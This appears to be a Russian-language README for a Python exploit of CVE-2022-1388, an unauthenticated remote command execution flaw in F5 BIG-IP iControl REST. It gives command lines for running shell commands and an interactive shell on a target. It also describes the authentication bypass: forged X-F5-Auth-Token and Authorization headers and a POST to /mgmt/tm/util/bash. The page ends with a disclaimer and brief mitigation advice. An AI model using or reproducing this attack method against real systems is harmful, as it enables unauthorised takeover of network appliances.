
Эксплойт на Python для CVE-2022-1388, неаутентифицированной уязвимости удаленного выполнения команд в F5 BIG-IP iControl REST. Поддерживает одиночные команды и интерактивные сессии оболочки.
Этот скрипт на Python эксплуатирует CVE-2022-1388, критическую уязвимость в F5 BIG-IP iControl REST, позволяющую неаутентифицированное удаленное выполнение команд из-за неправильного контроля доступа и обработки HTTP-заголовков.
⚠️ Только для образовательных целей и авторизованных исследований безопасности. Не используйте против систем, которыми вы не владеете или на тестирование которых не имеете явного разрешения.
--shell)python3 cve_2022_1388_exploit.py -u <target_url> -c "<command>"
python3 cve_2022_1388_exploit.py -u https://192.168.1.1 -c "id"

python3 cve_2022_1388_exploit.py -u https://192.168.1.1 -a "root:password" -c "whoami"

python3 cve_2022_1388_exploit.py -u https://192.168.1.1 --shell

Скрипт обходит аутентификацию, устанавливая поддельные заголовки X-F5-Auth-Token и Authorization.
Отправляет POST-запрос на: /mgmt/tm/util/bash
Полезная нагрузка запускает выполнение указанной команды shell.
Обновите до исправленных версий F5 BIG-IP в соответствии с рекомендациями F5 Security Advisory.
Ограничьте доступ к интерфейсу iControl REST.
Этот скрипт эксплойта предоставляется только в образовательных целях. Использование осуществляется исключительно на ваш собственный риск.